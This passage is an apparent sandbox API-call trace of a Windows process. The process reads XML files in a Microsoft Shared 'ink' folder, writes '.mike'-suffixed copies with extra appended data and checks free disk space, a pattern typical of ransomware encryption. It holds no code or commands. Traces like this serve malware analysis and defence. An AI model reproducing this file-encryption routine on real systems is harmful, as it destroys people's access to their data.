(dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.602] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), fInfoLevelId=0x0, lpFileInformation=0x2132660 | out: lpFileInformation=0x2132660*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c23c14, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c23c14, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9fc)) returned 1 [0043.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.602] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.602] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.602] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.602] GetFileType (hFile=0x264) returned 0x1 [0043.602] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.602] GetFileType (hFile=0x264) returned 0x1 [0043.603] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.603] ReadFile (in: hFile=0x264, lpBuffer=0x2133c30, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2133c30*, lpNumberOfBytesRead=0x2af0c8*=0x9fc, lpOverlapped=0x0) returned 1 [0043.604] CloseHandle (hObject=0x264) returned 1 [0043.605] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.605] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.605] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.605] GetFileType (hFile=0x264) returned 0x1 [0043.605] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.605] GetFileType (hFile=0x264) returned 0x1 [0043.605] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.605] WriteFile (in: hFile=0x264, lpBuffer=0x213a6a8*, nNumberOfBytesToWrite=0xa00, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x213a6a8*, lpNumberOfBytesWritten=0x2af0bc*=0xa00, lpOverlapped=0x0) returned 1 [0043.605] CloseHandle (hObject=0x264) returned 1 [0043.606] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.606] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.606] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.606] GetFileType (hFile=0x264) returned 0x1 [0043.606] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.606] GetFileType (hFile=0x264) returned 0x1 [0043.607] WriteFile (in: hFile=0x264, lpBuffer=0x213d8bc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x213d8bc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.608] CloseHandle (hObject=0x264) returned 1 [0043.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.608] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.608] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43061c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe43061c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe432c320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc20)) returned 1 [0043.608] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.608] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.609] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.609] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x213ef6c | out: lpFileInformation=0x213ef6c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43061c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe43061c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe432c320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc20)) returned 1 [0043.609] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.609] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.609] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", dwFileAttributes=0x80) returned 0 [0043.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.610] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.610] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe43061c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe43061c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe432c320, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc20)) returned 1 [0043.610] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml", lpFilePart=0x0) returned 0x3d [0043.610] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike", lpFilePart=0x0) returned 0x42 [0043.610] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipscsy.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipscsy.xml.mike")) returned 1 [0043.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.611] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.611] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.612] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.613] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.613] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.613] GetFileType (hFile=0x264) returned 0x1 [0043.613] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.613] GetFileType (hFile=0x264) returned 0x1 [0043.613] CloseHandle (hObject=0x264) returned 1 [0043.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.613] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.614] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.614] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), fInfoLevelId=0x0, lpFileInformation=0x2140ecc | out: lpFileInformation=0x2140ecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2)) returned 1 [0043.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), fInfoLevelId=0x0, lpFileInformation=0x21411bc | out: lpFileInformation=0x21411bc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2)) returned 1 [0043.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.614] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.614] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.614] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.614] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.615] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.615] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.615] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.615] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.615] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.616] GetFileType (hFile=0x264) returned 0x1 [0043.616] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.616] GetFileType (hFile=0x264) returned 0x1 [0043.616] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.616] WriteFile (in: hFile=0x264, lpBuffer=0x2141f10*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2141f10*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.617] CloseHandle (hObject=0x264) returned 1 [0043.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.617] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), fInfoLevelId=0x0, lpFileInformation=0x2141a54 | out: lpFileInformation=0x2141a54*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27c49d71, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c49d71, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9d2)) returned 1 [0043.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.617] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.617] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.617] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.617] GetFileType (hFile=0x264) returned 0x1 [0043.617] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.617] GetFileType (hFile=0x264) returned 0x1 [0043.617] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.617] ReadFile (in: hFile=0x264, lpBuffer=0x2143024, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x2143024*, lpNumberOfBytesRead=0x2af0c8*=0x9d2, lpOverlapped=0x0) returned 1 [0043.619] CloseHandle (hObject=0x264) returned 1 [0043.619] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.619] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.619] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.619] GetFileType (hFile=0x264) returned 0x1 [0043.619] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.620] GetFileType (hFile=0x264) returned 0x1 [0043.620] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.620] WriteFile (in: hFile=0x264, lpBuffer=0x21499e0*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21499e0*, lpNumberOfBytesWritten=0x2af0bc*=0x9e0, lpOverlapped=0x0) returned 1 [0043.620] CloseHandle (hObject=0x264) returned 1 [0043.621] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.621] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.621] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.621] GetFileType (hFile=0x264) returned 0x1 [0043.621] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.621] GetFileType (hFile=0x264) returned 0x1 [0043.622] WriteFile (in: hFile=0x264, lpBuffer=0x214cbf4*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x214cbf4*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.622] CloseHandle (hObject=0x264) returned 1 [0043.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml", lpFilePart=0x0) returned 0x3d [0043.623] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike", lpFilePart=0x0) returned 0x42 [0043.623] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.623] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsdan.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsdan.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe432c320, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe432c320, ftLastAccessTime.dwHighDateTime=0x1d57a86, 